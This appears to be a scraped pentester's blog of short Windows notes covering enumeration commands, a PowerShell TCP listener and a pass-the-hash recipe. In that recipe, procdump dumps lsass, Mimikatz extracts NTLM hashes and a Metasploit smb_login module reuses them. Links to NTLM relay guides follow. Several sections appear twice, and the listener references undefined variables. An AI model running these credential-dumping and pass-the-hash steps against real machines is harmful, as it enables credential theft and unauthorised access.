>wmic logicaldisk get caption, description, providername
Caption Description ProviderName
C: Local Fixed Disk
X: Network Connection \\server\user\XXX
Y: Network Connection \\server\public
Friday, October 18, 2019
Print all environment variables "set"
>set
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\XXXX\AppData\Roaming
CommonProgramFiles=C:\Program Files\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=PCNAME
ComSpec=C:\WINDOWS\system32\cmd.exe
DriverData=C:\Windows\System32\Drivers\DriverData
FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer
FPS_BROWSER_USER_PROFILE_STRING=Default
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\XXXX\AppData\Roaming
CommonProgramFiles=C:\Program Files\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=PCNAME
ComSpec=C:\WINDOWS\system32\cmd.exe
DriverData=C:\Windows\System32\Drivers\DriverData
FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer
FPS_BROWSER_USER_PROFILE_STRING=Default
Patches Installed wmic qfe
>wmic qfe
Caption CSName Description FixComments HotFixID InstallDate InstalledBy InstalledOn Name ServicePackInEffect Status
http://support.microsoft.com/?kbid=4514366 PCNAME Update KB4514366 NT AUTHORITY\SYSTEM XX/XX/XXXX
http://support.microsoft.com/?kbid=4515855 PCNAME Update KB4515855
http://support.microsoft.com/?kbid=4465065 PCNAME Update KB4465065 NT AUTHORITY\SYSTEM XX/XX/XXXX
http://support.microsoft.com/?kbid=4470788 PCNAME Security Update KB4470788 XX/XX/XXXX
http://support.microsoft.com/?kbid=4489907 PCNAME Security Update KB4489907 XX/XX/XXXX
http://support.microsoft.com/?kbid=4503308 PCNAME Security Update KB4503308 NT AUTHORITY\SYSTEM XX/XX/XXXX
Caption CSName Description FixComments HotFixID InstallDate InstalledBy InstalledOn Name ServicePackInEffect Status
http://support.microsoft.com/?kbid=4514366 PCNAME Update KB4514366 NT AUTHORITY\SYSTEM XX/XX/XXXX
http://support.microsoft.com/?kbid=4515855 PCNAME Update KB4515855
http://support.microsoft.com/?kbid=4465065 PCNAME Update KB4465065 NT AUTHORITY\SYSTEM XX/XX/XXXX
http://support.microsoft.com/?kbid=4470788 PCNAME Security Update KB4470788 XX/XX/XXXX
http://support.microsoft.com/?kbid=4489907 PCNAME Security Update KB4489907 XX/XX/XXXX
http://support.microsoft.com/?kbid=4503308 PCNAME Security Update KB4503308 NT AUTHORITY\SYSTEM XX/XX/XXXX
Windows Systeminfo
>systeminfo | findstr /C:"OS Name" /C:"OS Version"
OS Name: Microsoft Windows 10
OS Version: 10.0.XXX N/A Build XXXX
BIOS Version: Dell Inc. 1.XX, XX/XX/XXX
OS Name: Microsoft Windows 10
OS Version: 10.0.XXX N/A Build XXXX
BIOS Version: Dell Inc. 1.XX, XX/XX/XXX
Tuesday, October 15, 2019
Powershell listening on a port
$socket = new-object System.Net.Sockets.TcpListener('0.0.0.0', 1080);
if($socket -eq $null){
exit 1;
}
$socket.start();
$client = $socket.AcceptTcpClient();
$stream = $client.GetStream();
$buffer = new-object System.Byte[] 2048;
try
{
do
{
$read = $null;
while($stream.DataAvailable -or $read -eq $null) {
$read = $stream.Read($buffer, 0, 2048);
if ($read -gt 0) {
$data = [System.Text.Encoding]::ASCII.GetString($buffer).Trim(0x00).TrimEnd()
$buffer.Clear()
if($data -ne $null -and $data .Length -gt 0){
Write-Output ("RECEIVED : [{0}]" -f $data)
$sendBack = new-object System.Byte[] 2048;
$sendBack = [System.Text.Encoding]::UTF8.GetBytes($data)
$stream.Write($sendBack, 0, $results.Length)
$sendBack.Clear()
Write-Output ("SENT BACK: [{0}]" -f $data)
}
}
}
} While ($read -gt 0);
}
finally
{
$fileStream.Close();
$socket.Stop();
$client.close();
$stream.Dispose();
}
if($socket -eq $null){
exit 1;
}
$socket.start();
$client = $socket.AcceptTcpClient();
$stream = $client.GetStream();
$buffer = new-object System.Byte[] 2048;
try
{
do
{
$read = $null;
while($stream.DataAvailable -or $read -eq $null) {
$read = $stream.Read($buffer, 0, 2048);
if ($read -gt 0) {
$data = [System.Text.Encoding]::ASCII.GetString($buffer).Trim(0x00).TrimEnd()
$buffer.Clear()
if($data -ne $null -and $data .Length -gt 0){
Write-Output ("RECEIVED : [{0}]" -f $data)
$sendBack = new-object System.Byte[] 2048;
$sendBack = [System.Text.Encoding]::UTF8.GetBytes($data)
$stream.Write($sendBack, 0, $results.Length)
$sendBack.Clear()
Write-Output ("SENT BACK: [{0}]" -f $data)
}
}
}
} While ($read -gt 0);
}
finally
{
$fileStream.Close();
$socket.Stop();
$client.close();
$stream.Dispose();
}
Wednesday, October 2, 2019
Lsass Dump Mimikatz Pass the Hash Basics
procdump -ma lsass.exe {path to where you want it dumped}\lsass.dmp
Mimikatz.exe
# sekurlsa::minidump lsass.dmp
# sekurlsa::logonPasswords
Username : {user}
Domain : {domain}
NTLM : {NTLM Hash}
use auxillary/scanner/smb/smb_login
set SMBDomain {domain}
set SMBUser {user}
set RHOSTS {ip addr}
set SMBPass aad3b435b51404eeaad3b435b51404ee:{NTLM Hash}
run
Mimikatz.exe
# sekurlsa::minidump lsass.dmp
# sekurlsa::logonPasswords
Username : {user}
Domain : {domain}
NTLM : {NTLM Hash}
use auxillary/scanner/smb/smb_login
set SMBDomain {domain}
set SMBUser {user}
set RHOSTS {ip addr}
set SMBPass aad3b435b51404eeaad3b435b51404ee:{NTLM Hash}
run
good blog
https://blog.ropnop.com/practical-usage-of-ntlm-hashes/
When you can & cannot Pass the Hash
great blog
https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
From a pentesting perspective:
- You CAN perform Pass-The-Hash attacks with NTLM hashes.
- You CANNOT perform Pass-The-Hash attacks with Net-NTLM hashes.
You get NTLM hashes when dumping the SAM database of any Windows OS, a Domain Controller's NTDS.dit database or from Mimikatz (Fun fact, although you can't get clear-text passwords from Mimikatz on Windows >= 8.1 you can get NTLM hashes from memory). Some tools just give you the NT hash (e.g. Mimikatz) and that's perfectly fine: obviously you can still Pass-The-Hash with just the NT hash.
Subscribe to:
Posts (Atom)